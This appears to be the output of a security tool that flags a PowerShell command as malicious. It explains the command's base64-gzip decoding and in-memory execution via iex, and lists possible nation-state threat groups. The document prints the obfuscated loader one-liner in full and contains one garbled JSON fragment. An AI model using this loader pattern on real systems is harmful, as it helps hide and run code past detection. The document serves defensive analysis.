Malicious — high-confidence attack behavior
Multiple corroborating attack signals: Loader, Defense Evasion.
powershell -c "$b=[System.Convert]::FromBase64String('H4sIAAAAAAAA/6tWKkktLlGyUlIqS40vLUpVslIqLU4tykvMTQUA6nU3RDEAAAA=');$gz=New-Object IO.Compression.GZipStream((New-Object IO.MemoryStream(,$b)),[IO.Compression.CompressionMode]::Decompress);$sr=New-Object IO.StreamReader($gz);iex $sr.ReadToEnd()"Uses PowerShell to execute it as PowerShell code, decode a base64-encoded payload, and decompress a gzip/deflate payload.
The command leverages Powershell.exe, a Windows binary catalogued in LOLBAS as commonly abused for living-off-the-land attacks — known abuse categories: Execute. The payload uses base64-gzip (recovered) encoding — a common obfuscation technique to bypass signature-based detection and inline script-block logging.
The combination of high-confidence threat behavior, known-abused binary usage, and payload obfuscation strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment procedures.
{"test":""ve_ure":"usernamePowershell.exe is a a task-based command-line shell built on .NET.
Russian GRU Unit 26165 threat group active since at least 2004. Primarily targets governments, militaries, and security organizations.
Russian SVR threat group responsible for the SolarWinds supply chain attack and numerous government breaches. Known for stealthy, long-dwell intrusions.
Russian GRU Unit 74455 group responsible for NotPetya, attacks on Ukrainian power grid, and Olympic Destroyer. Focuses on destructive operations.
Russian FSB-linked group known for sophisticated backdoors and hijacking other threat actors' infrastructure. Active since at least 2004.
North Korean state-sponsored group linked to the $81M Bangladesh Bank heist, WannaCry ransomware, and Sony Pictures breach. The most prolific nation-state financial threat actor.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.